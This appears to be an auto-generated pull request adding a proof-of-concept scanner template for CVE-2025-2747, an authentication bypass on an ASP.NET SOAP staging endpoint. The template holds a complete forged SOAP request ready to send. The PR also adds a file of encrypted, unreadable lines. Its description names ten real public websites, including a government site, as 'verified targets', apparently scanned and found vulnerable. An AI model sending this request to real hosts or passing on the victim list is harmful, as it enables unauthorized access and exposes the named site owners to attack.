### PR TITLE
[Auto-POC] CVE-2025-2747 POC

### DIFF
--- a/templates/asp-net/asp-net-vul-ips.md
+++ b/templates/asp-net/asp-net-vul-ips.md
@@ -1,0 +1,13 @@
+# asp-net-vul-ips.md
+
+## CVE-2025-2747
+ENCv1:pvy+vjuEGMFX13dROhtkEA==:WREuxwOEVtWqlITq10qp3A==:RcgOJUdm/I+HVfa+hHlwhSrQvAyb86nuplZs4d9nFlc=
+ENCv1:NNMBN4ERxfTXuyLCpTtOXw==:TXn1YKuiYSdUzIp+xJsfSQ==:s07IkoUxoTDUsrrYIVX5e3PH/XhUQGKY5iNeOmBbdN4te7wLyJQQpPDNvs0tOtLl
+ENCv1:HR90vzQhtu91/gLCeeY2Ig==:WdbM4azM9mk9g21gyRY67A==:t7T1FB3icwK0WFLG4WWnROqftRveWbSgl9kuIMVAscMW6VumlZm3y/G6n6GzQ6DF
+ENCv1:ll+5+Gt9bSnczfe/5orsGQ==:rv2v6gf/Sd0WKfIuNRV/CQ==:Tu9cv5skU2gryc1KKuD29+za6jVxZK+ckIlFRq6PFeYSpU/KDwJ8cEeKSCZWfi4W
+ENCv1:JYalVzmI+X7SDpX/qzrRHQ==:jPzr5CIi+SgnpK4z2Qd7Vg==:ihQzFabzDO3n6Ip1aa5YGoic8dgsLIbnOoLOrnnjsTzUdNl+aHiGFbIc82L7CsKa
+ENCv1:imvBDSQeep1lgqCQ1bXJEA==:PeFPy4Zgpp784Fqx4Yttpg==:NQjuY7wskAp2iM2G8g2y7Vk28n0/URJn+lfkzwaOdyQ=
+ENCv1:tgJViqklttLAbv9nPadnEg==:OaZI4zWyk+ktcCVF6or2/w==:UFOoHw11CkgW9lgZbedD+rKGx4YbUeNyBM+nvR3TgbQ=
+ENCv1:iozMb5sQg+bozz3wuONnIA==:nIC73J8lr+Ts4fwMECIdAA==:5IExzHE2DFfNr8Igtu1CMsB+XCkVofIEhDbBeXJIbMQ=
+ENCv1:cJvNgEzlEoSS3Jn+Se5RTA==:2omm+0CEGA6WGj0EcYEyAA==:GBzA5iBst4jKz5I45k4MC/bFdmeHUuhgmN6p1zSX7ag=
+ENCv1:M8Qxr9mtmjwV/hOG/h5W0w==:7V1XmUh+pTFE2Bw09LVtbg==:lQf5U45nMmXSA1vb1OKf2ae9V9Y0D39d/BVK7KQKOkA=

--- a/templates/asp-net/cve-2025-2747.yml
+++ b/templates/asp-net/cve-2025-2747.yml
@@ -1,0 +1,13 @@
+cve-id: CVE-2025-2747
+severity: critical
+type: auth-bypass
+rules:
+- method: POST
+  path: /CMSPages/Staging/SyncServer.asmx
+  expression: response.body.bcontains(b"nwzje") && response.body.bcontains(b"<wsa:Action>") && response.content_type.contains("text/xml")
+  headers:
+    Content-Type: text/xml; charset=utf-8
+    SOAPAction: '"http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData"'
+  body: "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n    <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n        <soap:Header>\n            <wsse:Security xmlns:wsse=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\" xmlns:wsu=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\">\n        <wsse:UsernameToken>\n            <wsse:Username>y3t4kallxq</wsse:Username>\n            <wsse:Password Type=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest\">6dfzCOJsdj5Aw+1rGzwoHadPFTQ=</wsse:Password>\n            <wsse:Nonce>4JX/SboVYnxbh8hm3ySQdIUJtFK9cqUh</wsse:Nonce>\n            <wsu:Created>2025-03-10T20:11:07Z</wsu:Created>\n                </wsse:UsernameToken>\n            </wsse:Security>\n        </soap:Header>\n        <soap:Body>\n            <ProcessSynchronizationTaskData xmlns=\"http://localhost/SyncWebService/SyncServer\">\n                <stagingTaskData><![CDATA[<nwzje>]]></stagingTaskData>\n            </ProcessSynchronizationTaskData>\n        </soap:Body>\n    </soap:Envelope>"
+set:
+  rand: '{{to_lower(rand_text_alpha(5))}}'


### PR DESCRIPTION
## POC for CVE-2025-2747

### Verified targets

- https://www.nacsmagazine.com
- https://certiport.pearsonvue.com
- https://philadelphia.sound-advisor.com
- https://coretec.sound-advisor.com
- https://brandpanel.loyalty360.org
- https://stockerfoundation.org
- https://jeld-wen.co.uk
- https://www.jeld-wen.fr
- https://totaltechschool.com
- https://www.newportri.gov

---
*Auto-generated by CVE-Hunter-Pro*
